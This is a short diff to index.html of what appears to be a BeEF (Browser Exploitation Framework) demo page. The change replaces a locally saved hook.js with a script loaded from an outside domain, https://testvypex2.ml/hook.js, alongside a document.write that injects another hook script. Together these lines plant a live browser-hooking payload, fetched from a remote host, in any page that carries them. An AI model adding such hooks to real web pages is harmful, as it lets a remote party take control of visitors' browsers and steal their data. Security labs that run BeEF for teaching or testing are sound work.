--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
 	<script>
 		var commandModuleStr = '<script src="/hook.js" type="text/javascript"><\/script>';
 		document.write(commandModuleStr);
-	</script><script src="BeEF%20Basic%20Demo_files/hook.js" type="text/javascript"></script>
+	</script><script src="https://testvypex2.ml/hook.js" type="text/javascript"></script>
 </head>
 
 <body>
